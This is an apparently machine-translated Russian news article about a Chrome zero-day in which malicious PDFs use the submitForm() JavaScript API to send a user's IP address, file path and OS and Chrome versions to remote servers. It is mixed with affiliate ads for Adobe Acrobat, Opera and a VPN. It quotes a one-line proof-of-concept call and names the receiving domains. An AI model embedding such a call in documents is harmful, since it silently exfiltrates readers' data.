Ошибка Chrome позволяет хакерам собирать пользовательские данные с помощью файлов PDF

  • EdgeSpot обнаружил интригующую уязвимость нулевого дня, использующую PDF-документы в Chrome.
  • Этот уязвимость может навредить вам, собирая конфиденциальные данные на вашем компьютере.
  • Изучите наши Страница в Интернете и облаке для получения дополнительной информации о других инструментах и ​​услугах.
  • Если вас интересуют браузеры, мы предоставим много информации о них в нашем Хаб браузеров.
Ошибка Chrome позволяет хакерам собирать пользовательские данные из ваших файлов PDF
Как насчет использования лучшего менеджера документов?
Сделайте все свои документы доступными и безопасными с помощью Adobe Acrobat Reader. Этот инструмент управления документами также позволит вам ставить электронную подпись и создавать официальные формы, чтобы сэкономить ваше время на работе. Получите его для своего ПК, и вы сможете:
  • Открывайте, печатайте и редактируйте все ваши PDF-файлы и файлы других типов.
  • Заполнять PDF-формы проще
  • Храните важные документы в зашифрованном виде

Получите все приложения по специальной цене!

Программное обеспечение для управления документами №1 в мире теперь по отличной цене, так что поторопитесь!

Сервис обнаружения эксплойтов EdgeSpot обнаружил интригующий Хром уязвимость нулевого дня, использующая PDF-документы.

Уязвимость позволяет злоумышленникам собирать конфиденциальные данные с использованием вредоносных PDF-документов, открытых в Chrome.

Как только жертва открывает соответствующие PDF-файлы в Google Chrome, вредоносная программа начинает работать в фоновом режиме, собирая пользовательские данные.

Затем данные пересылаются на удаленный сервер, который контролируется хакерами. Вам может быть интересно, какие данные забирают злоумышленники, они нацелены на следующие данные на вашем ПК:

  • айпи адрес
  • Полный путь к файлу PDF в системе
  • Версии ОС и Chrome

Остерегайтесь файлов PDF, зараженных вредоносным ПО

Эксперты пятнистый что один из двух доменов readnotify [.] com или же burpcollaborator [.] net получал данные.

Выяснилось, что злоумышленники используют this.submitForm () PDF Javascript API для сбора конфиденциальной информации пользователей.

Мы протестировали его с минимальным PoC, простым вызовом API, например this.submitForm (‘ http://google.com/test’) заставит Google Chrome отправлять личные данные на google.com.

Эта ошибка Chrome использовалась двумя различными наборами вредоносных PDF-файлов, оба из которых были распространены в октябре 2017 года и сентябре 2018 года соответственно.

Примечательно, что собранные данные могут быть использованы злоумышленниками для точной настройки атак в будущем. Согласно отчетам, первая партия файлов была скомпилирована с помощью службы отслеживания PDF-файлов ReadNotify.

Пользователи могут использовать сервис для отслеживания просмотров пользователей. EdgeSpot не поделился какими-либо подробностями относительно природы второго набора файлов PDF.

Совет: измените свой браузер на Opera

В эти смутные времена мы подвергаемся атакам вредоносных программ, фишинга и троянов на каждом этапе, поэтому мы должны быть более бдительными и оставаться защищенными.

И поскольку это проблема, специфичная для Chrome, вы можете избежать этой и всех других угроз с помощью ориентированного на безопасность браузера, такого как Опера.

В этом браузере есть встроенный блокировщик рекламы, который не только убирает отвлекающие факторы, но и блокирует скрипты аналитики, пиксели отслеживания и методы сбора ваших данных.

А если вы хотите быть абсолютно уверены в том, что держитесь подальше от любой опасности, отойдите за встроенный VPN услуга, которая на 100% бесплатна для использования в течение неограниченного времени.

Опера

Опера

Opera предлагает идеальную защиту от угроз с помощью встроенного блокировщика рекламы и бесплатного VPN-сервиса!

Бери задаром
Посетить вебсайт

Как я могу защитить себя от уязвимостей PDF?

Скачать Adobe Acrobat PRO

Adobe Acrobat PRO

Adobe и Chrome отлично подходят для работы с PDF-файлами. Установив расширение Adobe для Chrome, вы можете просматривать PDF-файлы и изменять их по своему вкусу, не выходя из любимого браузера.

Несмотря на прочную структуру, вредоносные программы, скрытые в файлах PDF, могут не обнаруживаться, если вы используете стандартную версию Reader.

Профессиональная версия рекомендуется, чтобы гарантировать вашу защиту и защитить ваши данные от хакеров.

Хотя это не бесплатно, цена, которую вы заплатите, довольно мала за множество дополнительных функций, которые вам понравятся, включая повышенную безопасность ваших файлов PDF.

Также имеется 7-дневная бесплатная пробная версия, чтобы вы могли ощутить все возможности Pro, прежде чем совершить покупку.

Adobe Acrobat PRO

Adobe Acrobat PRO

Держитесь подальше от вредоносных программ, загрузив Adobe Acrobat PRO. В ней гораздо больше функций, чем в бесплатной версии, и она обеспечивает безопасность ваших данных.

Бесплатная пробная версия
Посетить вебсайт

Если вы хотите обезопасить себя при серфинге в Интернете, вам понадобится специализированный инструмент для защиты вашей сети. Установите частный доступ в Интернет прямо сейчас и обезопасить себя. Он защищает ваш компьютер от атак во время просмотра, маскирует ваш IP-адрес и блокирует любой нежелательный доступ.


Служба обнаружения эксплойтов EdgeSpot хотела предупредить пользователей Chrome о потенциальных рисках, поскольку не ожидалось, что патч будет выпущен в ближайшем будущем.

EdgeSpot сообщил Google об уязвимости в прошлом году, и компания пообещала выпустить патч в конце апреля.

Однако вы можете рассмотреть возможность использования временного решения проблемы, локально просмотрев полученные документы PDF с помощью другого приложения для чтения.

Кроме того, вы также можете открывать свои PDF-документы в Chrome, отключив свои системы от Интернета.

Часто задаваемые вопросы

  • Да, это так. Но если вы хотите более широкий выбор, изучите наши лучшие выборы для ХромКонфиденциальность расширения в это полное руководство.

  • Твот много расширений, которые позволяют PDF-файлы обработка. Проверять из нашего отличный гид о лучших расширениях PDF для Chrome.

  • Нет, но вы можете быстро активировать его. Вот наш подробное руководство о том, как включить генератор QR-кода в Chrome.

Microsoft Purview получает новую страницу отчетов для предотвращения кражи IP

Microsoft Purview получает новую страницу отчетов для предотвращения кражи IPMicrosoftКибербезопасность

Новая страница отчетов появится в Purview в январе 2024 года.Предварительный просмотр этой функции состоится позднее в этом месяце.Он станет общедоступным в 2024 году.Новая страница отчетов облегчи...

Читать далее
3 лучших антивируса для NAS-хранилища для защиты конфиденциальных данных

3 лучших антивируса для NAS-хранилища для защиты конфиденциальных данныхМесто храненияКибербезопасность

Мир оцифровывается с головокружительной скоростью, и пара пыльных ящиков или полок больше не могут считаться надежной альтернативой хранению информации. Вместо этого современные системы хранения, т...

Читать далее
Антивирус для QNAP: 3 варианта, которые стоит попробовать бесплатно

Антивирус для QNAP: 3 варианта, которые стоит попробовать бесплатноМесто храненияКибербезопасность

Антивирус ESET поставляется со всеми инструментами безопасности, которые могут вам когда-либо понадобиться для защиты ваших данных и конфиденциальности, в том числе:Защита от кражиЗащита веб-камеры...

Читать далее